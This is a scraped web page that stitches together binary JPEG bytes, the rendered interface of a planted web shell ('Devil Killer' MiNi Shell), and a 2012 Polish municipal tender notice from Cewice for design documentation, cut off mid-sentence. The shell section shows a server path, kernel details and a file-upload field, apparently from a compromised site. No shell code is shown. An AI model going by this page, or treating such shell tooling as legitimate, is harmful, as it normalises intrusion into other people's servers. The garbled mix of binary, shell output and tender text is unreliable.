JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120308/54603-N-2012.html

<p class="kh_header"><b>Cewice: Opracowanie dokumentacji projektowych w 2012 roku</b><br>
<b>Numer ogłoszenia: 54603 - 2012; data zamieszczenia: 08.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Cewice z siedzibą organu wykonawczego gminy , ul. W. Witosa 16, 84-312 Cewice, woj. pomorskie, tel. 059 8613460, faks 059 8613462.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.cewice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowych w 2012 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje opracowanie n/w dokumentacji projektowych:
1.Opracowanie projektu budowlanego  i  wykonawczego  na  budowę  kolektora  sanitarnego  wraz z przepompownią w m. Oskowo. 2.Opracowanie projektu budowlanego i wykonawczego na budowę sieci wodociągowej i studni głębinowych w m. Karwica - Lesiaki gm. Cewice 3.Opracowanie projektu budowlanego i wykonawczego na budowę sieci wodociągowej i studni głębinowych w m. Pieski gm. Cewice 4.Opracowanie projektu budowlanego na budowę ciągu pieszo-rowerowego w m. Cewice. 5.Opracowanie projektów budowlanych na przejścia dla pieszych w m. Bukowina, Popowo, Łebunia i Osowo Lęborskie.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających w części III zamówienia, do 50% wartości tej części zamówienia .</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.22.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych wymagań w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust 1 w zw. z art. 44 ustawy na zasadzie spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca posiadał doświadczenie w zrealizowaniu w ciągu ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie zamówień polegających na wykonaniu co najmniej 1 projektu budowlano-wykonawczego w zakresie zbliżonym do przedmiotu zamówienia w każdej części, tzn.:1.W CZĘŚCI I ZAMÓWIENIA - co najmniej  1 projektu budowlano-wykonawczego z zakresu gospodarki ściekowej o  wartości min. 15.000 zł brutto. 2.W CZĘŚCI II ZAMÓWIENIA - co najmniej  1 projektu budowlano-wykonawczego z zakresu gospodarki wodociągowej o  wartości min. 35.000 zł brutto. 3.W CZĘŚCI III ZAMÓWIENIA - co najmniej  1 projektu budowlano-wykonawczego z zakresu gospodarki wodociągowej o  wartości min. 40.000 zł brutto. 4.W CZĘŚCI IV ZAMÓWIENIA - co najmniej  1 projektu budowlano-wykonawczego z zakresu budowy dróg, chodników, ścieżek rowerowych itp. o  wartości min. 4.500 zł brutto. 5.W CZĘŚCI V ZAMÓWIENIA - co najmniej  1 projektu budowlano-wykonawczego z zakresu budowy dróg, chodników , przejść dla pieszych itp. o  wartości min. 10.000 zł brutto. Ocena spełniania warunku na podstawie oświadczeń lub dokumentów złozonych w ofercie na zasadzie spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych wymagań w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust 1 w zw. z art. 44 ustawy na zasadzie spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca udowodnił dysponowanie dla każdej części zamówienia zespołem projektowym złożonym z osób posiadających uprawnienia do projektowania w następujących branżach tzn.:1.W CZĘŚCI I ZAMÓWIENIA:a)instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych,b)instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych 2.W CZĘŚCI II i III ZAMÓWIENIA:a)instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych b)instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych  c)konstrukcyjno-budowlanej 3.W CZĘŚCI IV i V ZAMÓWIENIA: a)w pracach zespołu projektowego należy zapewnić udział projektanta w specjalności drogowej. Ocena spełniania warunku na podstawie oświadczeń lub dokumentów złozonych w ofercie na zasadzie spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych wymagań w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust 1 w zw. z art. 44 ustawy na zasadzie spełnia nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Każda oferta musi zawierać: a)formularz oferty ; b)oświadczenie z art. 22 ust. 1 ustawy; c)oświadczenie z art. 24 ust. 1 ustawy d)stosowne pełnomocnictwa w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio z dokumentów dołączonych do oferty; e)w przypadku Wykonawców wspólnie ubiegających się o realizację zamówienia dokument ustanawiający Pełnomocnika do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego; f)wykaz wykonanych usług g)wykaz osób uczestniczących w realizacji zamówienia  h)oświadczenie Wykonawcy, iż osoby biorące udział w realizacji zamówienia posiadają wymagane kwalifikacje do wykonania przedmiotu zamówienia, jeżeli ustawy nakładają obowiązek ich posiadania i)wykaz części zamówienia, których wykonanie zostanie powierzone podwykonawcy j)zobowiązanie podmiotu trzeciego do oddania swoich zasobów do dyspozycji - jeżeli dotyczy. W stosunku do Wykonawców zagranicznych wymaga się złożenia powyższych dokumentów w języku polskim lub z tłumaczeniem na język polski poświadczonym za zgodność z oryginałem przez Wykonawcę. Zamawiający, określając wymogi dla każdej osoby w zakresie posiadanych uprawnień projektowych, dopuszcza odpowiadające im uprawnienia projektowe, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane (tekst jednolity Dz.U. z 2006r. nr 156, poz. 1118 ze zm.) oraz ustawy  o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r. nr 63, poz. 394 z późn. zm.). Jeżeli Wykonawcy wspólnie ubiegają się o zamówienie, zgodnie z art. 23 w związku z art. 141 ustawy PZP Zamawiający żąda aby: 1)dokumenty wymagane odnośnie potwierdzenia spełniania warunków udziału w postępowaniu wymienionych w art. 22 ust 1 ustawy zostały złożone wspólnie przez Wykonawców, zaś odnośnie spełniania warunku niepodlegania wykluczeniu z postępowania na podstawie art. 24 ust 1 ustawy osobno przez każdego Wykonawcę; 2)w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, winni oni ustanowić Pełnomocnika do reprezentowania ich w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia. Załączone Pełnomocnictwo powinno zawierać: jednoznaczne określenie postępowania, do którego się odnosi i precyzować zakres umocowania; wymieniać wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia i zawierać podpisy każdego z nich;
3)wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem; Jeżeli Wykonawca wykazując spełnianie warunków posiadania doświadczenia oraz osób zdolnych do wykonania zamówienia, polega na zasobach innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków winien udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia lub inny dokument potwierdzający ten fakt.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w zakresie:
1.Termin realizacji zamówienia może ulec zmianie w następujących warunkach:
a)zmiany spowodowane opóźnieniami w uzyskaniu uzgodnień, decyzji, opinii oraz innych dokumentów niezbędnych do prawidłowej realizacji przedmiotu zamówienia, wynikające nie z winy Zamawiającego i Wykonawcy, lecz z przyczyn zależnych od instytucji wydających powyższe dokumenty. 2.Warunki zmian: a)inicjowanie zmian -na wniosek Wykonawcy lub Zamawiającego b)uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, c)forma zmian: aneks do umowy w formie pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.cewice.pl/zamowienia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Cewicach ul. W. Witosa 16, 84-312 Cewice, pokój nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2012 godzina 11:00, miejsce: Urząd Gminy ul. W. Witosa 16 84-312 Cewice, pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie projektu budowlanego  i wykonawczego  na  budowę  kolektora  sanitarnego  wraz z przepompownią w m. Oskowo..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Dane do projektowania:1)Do podłączenia są 3 budynki mieszkalne wielorodzinne ( 8 rodzin - 43 osoby) plus budynek jednorodzinny w budowie. Przewidywana ilość odprowadzonych ścieków ok.115 m3/m-c. 2)Włączenie nowoprojektowanego kolektora ścieków do istniejącej przepompowni ścieków na dz. 82/3. Ze względu na występujące różnice wysokościowe istnieje potrzeba zaprojektowania małej przepompowni ścieków (2 pompowej).  3)Przewidywana długość trasy kolektora ok. 400 m. Proponowany przebieg trasy kolektora sanitarnego stanowi załącznik graficzny do postępowania. Trasa kolektora przechodzi przez rzekę Bukowinę i obszar NATURA 2000 ( Dolina Łupawy) . Teren nie jest objęty m.p.z.p. 2.Zakres przedmiotu zamówienia obejmuje: 1)Uzyskanie we własnym zakresie mapy do celów projektowych. 2)Uzyskanie niezbędnych map ewidencyjnych oraz wypisów z rejestru gruntów, 3)Przygotowanie dokumentów do wniosku o wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, decyzji o lokalizacji celu publicznego oraz pozwolenia na budowę, 4)Uzyskanie w imieniu Zamawiającego decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, decyzji o lokalizacji celu publicznego,  prawomocnego pozwolenia na budowę. 5)Uzyskanie pisemnych zgód od właścicieli gruntów przez teren, których przebiegać będzie kanalizacja . Do zgód właścicieli działek ( w tym także osób prawnych), które będą podstawą złożenia oświadczeń o prawie do dysponowania nieruchomościami do celów budowlanych, należy dołączyć zestawienie zawierające imię i nazwisko (nazwę właściciela nieruchomości), nr ewidencyjny działki oraz datę uzyskania zgody właściciela działki . Zgody właścicieli nieruchomości należy uzyskać odrębnie dla każdej działki, z wyjątkiem właścicieli będących osobami prawnymi.6)Uzyskanie warunków przyłączenia do sieci elektroenergetycznej dla nowoprojektowanej  przepompowni. 7)Uzyskanie wszelkich niezbędnych warunków technicznych, opinii, uzgodnień, decyzji wymaganych przepisami Prawa  Budowlanego. 8)Badanie podłoża gruntowego w osi lokalizowanej sieci kanalizacyjnej oraz w planie lokalizacji zbiornika przepompowni  - w 4 egz. + 1 egz. w wersji elektronicznej 9)Opracowanie raportu oddziaływania na środowisko (jeżeli będzie wymagany)  w 4-ch egz. + 1 egz. w wersji elektronicznej 10)Opracowanie operatu wodnoprawnego i uzyskanie pozwolenia wodnoprawnego w 3-ch egz. + 1 egz. w wersji elektronicznej 11)Opracowanie następujących projektów:
a)projektu budowlanego, projektu wykonawczego dla sieci kanalizacji sanitarnej , przepompowni,  informacji BIOZ - w 5-ciu egz.+ 1 egz. w wersji elektronicznej. 
b) projektu instalacji elektroenergetycznej  z połączeniem kablowym ZK  przepompowni  - w 5-ciu egz. + 1 egz. w wersji elektronicznej.  12)Opracowanie  przedmiaru robót i kosztorysów inwestorskich po 2 egz. + 1 egz. w wersji elektronicznej . 13)Opracowanie specyfikacji technicznej wykonania i odbioru robót - w 2-ch egz. + 1 egz. w wersji elektronicznej 3.Wersje elektroniczne powinny być  złożone na nośniku CD lub DVD w formie zapisu PDF (tekst), JPG (rysunki)  do publikacji.4.Dokumentację projektową należy opracować zgodnie z: 
-Ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.) -Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120, poz.1133 ), -Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych określanych w programie funkcjonalno-użytkowym (Dz. U. Nr 202,poz.2072 ze zm.) 5.Kosztorys inwestorski i przedmiar robót określający planowane koszty robót budowlanych należy opracować zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389).  6.Termin wykonania 31.10.2012 r. 7.Zaleca się, aby Wykonawca przed złożeniem oferty dokonał wizji lokalnej w terenie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.22.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie projektu budowlanego i wykonawczego na budowę sieci wodociągowej i studni głębinowych w m. Karwica-Lesiaki gm. Cewice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Dane do projektowania: 1)Przebieg trasy, parametry oraz wymagania techniczne określone są w Koncepcji zaopatrzenia w wodę miejscowości Karwica-Lesiaki, która stanowi  podstawę ramową do  opracowania projektu i jest własnością Zamawiającego. 2)Opracowanie projektu nie obejmuje części obszaru wokół studni istniejącej (St istn.) 3)Projekt powinien być tak opracowany, aby była możliwość etapowania inwestycji: I cz. dla obszaru wokół  St1, II cz. dla obszaru wokół St2.  4)Teren nie jest objęty m.p.z.p, leży częściowo w obszarze NATURA 2000 (Karwickie Źródliska)  2.Zakres przedmiotu zamówienia obejmuje: 1)Uzyskanie we własnym zakresie mapy do celów projektowych. 2)Uzyskanie niezbędnych map ewidencyjnych oraz wypisów z rejestru gruntów, 3)Przygotowanie dokumentów do wniosku o wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, decyzji o lokalizacji celu publicznego oraz pozwoleń na budowę, 4)Uzyskanie w imieniu Zamawiającego decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, decyzji o lokalizacji celu publicznego, prawomocnych pozwoleń na budowę. 5)Uzyskanie pisemnych zgód od właścicieli gruntów przez teren, których przebiegać będzie  wodociąg. Do zgód właścicieli działek ( w tym także osób prawnych), które będą podstawą złożenia oświadczeń o prawie do dysponowania nieruchomościami do celów budowlanych, należy dołączyć zestawienie zawierające imię i nazwisko (nazwę właściciela nieruchomości), nr ewidencyjny działki oraz datę uzyskania zgody właściciela działki . Zgody właścicieli nieruchomości należy uzyskać odrębnie dla każdej działki, z wyjątkiem właścicieli będących osobami prawnymi. 6)Uzyskanie warunków przyłączenia do sieci elektroenergetycznej do zasilania studni głębinowych . 7)Uzyskanie wszelkich niezbędnych warunków technicznych, opinii, uzgodnień, decyzji wymaganych przepisami Prawa  Budowlanego. 8)Badanie geologiczne gruntu w osi lokalizacji sieci wodociągowej oraz w planowanym miejscu lokalizacji studni - w 4 egz. + 1 egz. w wersji elektronicznej  9)Opracowanie projektu robót geologicznych - w 4 egz. + 1 egz. w wersji elektronicznej 10)Opracowanie raportu oddziaływania na środowisko (jeżeli będzie wymagany)  w 4-ch egz. + 1 egz. w wersji elektronicznej 11)Opracowanie operatu wodnoprawnego i uzyskanie pozwolenia wodnoprawnego w 3-ch egz. + 1 egz. w wersji elektronicznej. 12)Opracowanie następujących projektów: a)projektu budowlanego, projektu wykonawczego dla sieci wodociągowej ,  informacji BIOZ - w 5-ciu egz.+ 1 egz. w wersji elektronicznej.  b)projektu przyłącza energetycznego do zasilania studni głębinowych - w 5-ciu egz. + 1 egz. w wersji elektronicznej. c)projektu konstrukcyjno-budowlanego budynków hydroforni, stacji uzdatniania wody  - w 5-ciu egz. + 1 egz. w wersji elektronicznej. d)projektu wykonawczego ze szczegółową technologią budowy studni głębinowych oraz technologii uzdatniania wody - w 5-ciu egz. + 1 egz. w wersji elektronicznej 13)Opracowanie  przedmiaru robót i kosztorysów inwestorskich po 2 egz. + 1 egz. w wersji elektronicznej na poszczególne etapy tj.  a)Studnia St1 , hydrofornia wraz ze stacją uzdatniania wody i sieć wodociągowa b)Studnia St2,  hydrofornia wraz ze stacją uzdatniania wody i sieć wodociągowa 14)Opracowanie specyfikacji technicznej wykonania i odbioru robót - w 2-ch egz. + 1 egz. w wersji 